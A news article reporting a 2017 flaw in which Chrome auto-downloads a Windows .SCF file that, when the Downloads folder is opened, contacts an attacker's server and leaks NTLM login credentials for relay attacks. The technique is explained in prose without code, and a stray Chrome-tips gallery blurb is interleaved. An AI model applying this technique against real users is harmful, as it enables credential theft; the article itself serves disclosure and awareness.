GETTY • GOOGLE
Hackers could use Google Chrome to gain access to your Windows login
Google Chrome users have been cautioned about a new software bug that allows hackers to steal login credentials for Windows.
These login details can be immediately reused, allow cybercriminals to "impersonate members of the organisation" and launch further attacks "on other users or gain access and control of IT resources".
The terrifying new vulnerability was disclosed by security engineer Bosko Stankovic.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials," Stankovic wrote.
Google Chrome – The 11 hidden tricks EVERY Chrome users needs to know
Wed, March 15, 2017
Google Chrome is the most popular web browser on the planet. It is easy-to-use, lightning-fast, and has a tonne of hidden tricks and features that you probably do not know about. Here's how to get the most from your web browser.
1 of 12
Here's how to get the most from your web browser
To siphon Windows login credentials with Google Chrome, Stankovic combined two previous attack techniques – one borrowed from the Stuxnet campaign, and another demonstrated by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference.
According to Stankovic, the attack is relatively simple to execute.
Hackers need to trick victims into clicking on a malicious link, which automatically downloads a Windows Explorer Shell Command File or SCF file.
"With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one," Stankovic writes.
"From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage.
"However, what if the downloaded file requires no user interaction to perform malicious actions?"
Once the .SCF file is automatically downloads to the user's Download folder, where it lays dormant until the opens the Download directory in Windows.
This launches the malicious .SCF file, which then attempts to retrieve data linked with a Windows icon located on the attacker’s server.
DefenceCode did not inform Google about the vulnerability following the publication of the blog.
However a spokesperson for Google told ThreatPost: "We’re aware of this and taking the necessary actions."
"Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password," Stankovic has warned.